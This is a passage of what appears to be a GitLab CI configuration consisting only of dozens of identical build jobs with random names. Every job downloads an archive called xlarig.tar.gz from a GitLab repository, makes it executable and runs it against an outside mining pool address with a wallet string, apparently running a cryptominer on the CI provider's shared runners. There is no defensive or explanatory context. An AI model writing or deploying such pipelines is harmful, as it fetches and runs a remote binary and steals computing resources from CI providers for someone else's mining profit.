     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_ftrew:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_asdfdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdfdgaw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdfdshgfdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dsfdgdfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdffhgdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdfhfgw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_fsdfdsfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdvfdbw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_vfdbfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_sdfghfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dfgfhw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_fgdhgfw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_fhghdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_dsfsdw:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdsfsd:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wsdfbvs:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdfgfdh:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdsfhfdh:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdsffg:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdfdshfd:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdsvdfbn:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvbbgfn:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wasdde:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wsdfvx:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wbnerg:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wbernb:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvber:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wbern:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wcewv:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvebx:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvreber:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvervgb:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvreverb:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wverbe:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wverv:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wervfe:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wergv:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvre:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wrth:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wnhg:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wcds:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvvds:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvdf:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvdf:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvfd:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wfd:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdfvfd:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdfvfd:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan
    
build_wdfvdf:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wdfvfd:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvfdv:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wvfdv:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wrdsc:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wsx:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan

build_wss:
  stage: build
  script:
     - wget https://gitlab.com/bromase889/cobagas/-/raw/main/xlarig.tar.gz  
     - tar -xvf xlarig.tar.gz 
     - chmod 777 xlarig
     - ./xlarig -o 157.245.150.226:80 -u ZEPHYR2BcgCURr7KMEwog6HXk83Hbmf5eYv3mNTCeLgBGLkneZeS2pMiJ5D7WpEyycj22yyWzCUfUKBHQpXCXAYZDZ3sdvYLNzc33 -p atosan